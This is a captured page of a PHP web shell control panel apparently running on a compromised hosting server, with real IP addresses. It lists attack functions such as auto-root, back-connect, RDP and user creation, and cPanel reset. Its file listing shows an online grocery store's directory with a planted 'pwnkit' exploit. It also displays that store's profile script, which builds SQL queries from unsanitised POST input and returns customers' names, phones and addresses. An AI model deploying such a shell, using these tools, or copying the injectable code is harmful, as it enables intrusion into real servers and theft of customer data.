Linux server.hostify.co.in 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Apache
: 162.214.74.213 | : 216.73.216.77
438 Domain
8.2.31
orangegroceries
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
orangegroceries /
public_html /
android /
[ HOME SHELL ]
Name
Size
Permission
Action
profile-image
[ DIR ]
drwxr-xr-x
razorpay-php
[ DIR ]
drwxr-xr-x
aboutus.php
382
B
-rw-r--r--
add_cart.php
1.8
KB
-rw-r--r--
add_wishlist.php
1.51
KB
-rw-r--r--
address_details.php
696
B
-rw-r--r--
addto_cart.php
1.69
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
ads.php
536
B
-rw-r--r--
ba32e21b6ad26e41ca8ff1a64cdb8f...
606.34
KB
-rw-r--r--
best_product.php
1.16
KB
-rw-r--r--
brand.php
533
B
-rw-r--r--
cart_banner.php
536
B
-rw-r--r--
cart_count.php
1.81
KB
-rw-r--r--
category-homepg.php
1.18
KB
-rw-r--r--
category-homepg1.php
763
B
-rw-r--r--
category-homepg2.php
1.09
KB
-rw-r--r--
category.php
536
B
-rw-r--r--
change_password.php
420
B
-rw-r--r--
check_status.php
620
B
-rw-r--r--
checkout.php
2.54
KB
-rw-r--r--
checkout1.php
906
B
-rw-r--r--
city_country.php
711
B
-rw-r--r--
city_spinner.php
738
B
-rw-r--r--
city_state.php
711
B
-rw-r--r--
conform_otp.php
698
B
-rw-r--r--
constant.php
116
B
-rw-r--r--
country_spinner.php
711
B
-rw-r--r--
db_config.php
384
B
-rw-r--r--
delete_cart.php
354
B
-rw-r--r--
delete_cart_item.php
649
B
-rw-r--r--
delete_cart_session.php
667
B
-rw-r--r--
delete_profile.php
336
B
-rw-r--r--
delete_wishlist.php
370
B
-rw-r--r--
enquiry.php
542
B
-rw-r--r--
feacture-product.php
1.16
KB
-rw-r--r--
forgot_password.php
417
B
-rw-r--r--
get_profile.php
2.61
KB
-rw-r--r--
google-login.php
1.05
KB
-rw-r--r--
help_center.php
297
B
-rw-r--r--
home_banner.php
536
B
-rw-r--r--
images.php
572
B
-rw-r--r--
imags.php
548
B
-rw-r--r--
invoice_details.php
1.25
KB
-rw-r--r--
login.php
761
B
-rw-r--r--
my_orders.php
562
B
-rw-r--r--
offers.php
838
B
-rw-r--r--
order_product.php
855
B
-rw-r--r--
order_status.php
2.16
KB
-rw-r--r--
payment_offline.php
3.19
KB
-rw-r--r--
payment_update.php
7.19
KB
-rw-r--r--
privacy-policy.php
381
B
-rw-r--r--
product.php
1.19
KB
-rw-r--r--
product_details.php
520
B
-rw-r--r--
product_wise_detail.php
1.2
KB
-rw-r--r--
promo_code.php
541
B
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
razorpay_genid.php
1001
B
-rw-r--r--
register.php
4.74
KB
-rw-r--r--
resend_otp.php
1.11
KB
-rw-r--r--
return-policy.php
388
B
-rw-r--r--
search_product.php
1.15
KB
-rw-r--r--
send_message.php
1.33
KB
-rw-r--r--
session_cart_count.php
1.52
KB
-rw-r--r--
slider.php
394
B
-rw-r--r--
sort_product.php
919
B
-rw-r--r--
state_spinner.php
703
B
-rw-r--r--
sub_category.php
713
B
-rw-r--r--
sub_sub_category.php
720
B
-rw-r--r--
term_condition.php
389
B
-rw-r--r--
upd_userid.php
449
B
-rw-r--r--
update_address.php
670
B
-rw-r--r--
update_detail.php
775
B
-rw-r--r--
update_profile.php
776
B
-rw-r--r--
update_qty.php
437
B
-rw-r--r--
update_shpaddr.php
834
B
-rw-r--r--
update_shpaddress.php
912
B
-rw-r--r--
updsession_qty.php
472
B
-rw-r--r--
user_payment.php
788
B
-rw-r--r--
video.php
6.25
KB
-rw-r--r--
whatsapp_banner.php
540
B
-rw-r--r--
wishlist.php
543
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : get_profile.php
<?php include("db_config.php"); if($_SERVER['REQUEST_METHOD']=='POST'){ $usersList_array =array(); $row_array = array(); $user_id = $_POST['user_id']; $sql="select * from user_profile where user_profile.id ='$user_id'"; $result = mysqli_query($conn, $sql); $json_response = array(); if(mysqli_num_rows($result) > 0) { while($row = mysqli_fetch_assoc($result)) { $country=$row['country']; $state=$row['state']; $city=$row['city']; $sql_country = mysqli_query($conn,"select * from countries where id = '$country'"); $row_country = mysqli_fetch_array($sql_country); $sql_state = mysqli_query($conn,"select * from states where id = '$state'"); $row_state = mysqli_fetch_array($sql_state); $sql_city = mysqli_query($conn,"select * from cities where id = '$city'"); $row_city = mysqli_fetch_array($sql_city); $shp_country=$row['shp_country']; $shp_state=$row['shp_state']; $shp_city=$row['shp_city']; $sql_shcountry = mysqli_query($conn,"select * from countries where id = '$shp_country'"); $row_shcountry = mysqli_fetch_array($sql_shcountry); $sql_shstate = mysqli_query($conn,"select * from states where id = '$shp_state'"); $row_shstate = mysqli_fetch_array($sql_shstate); $sql_shcity = mysqli_query($conn,"select * from cities where id = '$shp_city'"); $row_shcity = mysqli_fetch_array($sql_shcity); $row_array['fname'] = $row['fname']; $row_array['email'] = $row['email']; $row_array['mob_no'] = $row['mob_no']; $row_array['address'] = $row['addr']; $row_array['landmark'] = $row['landmark']; $row_array['bpincode'] = $row['pincode']; $row_array['image'] = $row['image']; $row_array['profile_img'] = $row['prof_img']; $row_array['bcountry'] = $row_country['name']; $row_array['bstate'] = $row_state['name']; $row_array['bcity'] = $row_city['name']; $row_array['sh_name'] = $row['sh_name']; $row_array['sh_phone'] = $row['sh_phone']; $row_array['shp_addr'] = $row['shp_addr']; $row_array['sh_landmark'] = $row['sh_landmark']; $row_array['shp_pincode'] = $row['shp_pincode']; $row_array['shp_country'] = $row_shcountry['name']; $row_array['shp_state'] = $row_shstate['name']; $row_array['shp_city'] = $row_shcity['name']; $row_array['id'] = $row['id']; $row_array['notes'] = array(); array_push($usersList_array, $row_array); } } echo json_encode($usersList_array, JSON_PRETTY_PRINT); //echo json_encode($response); mysqli_close($conn); }
Close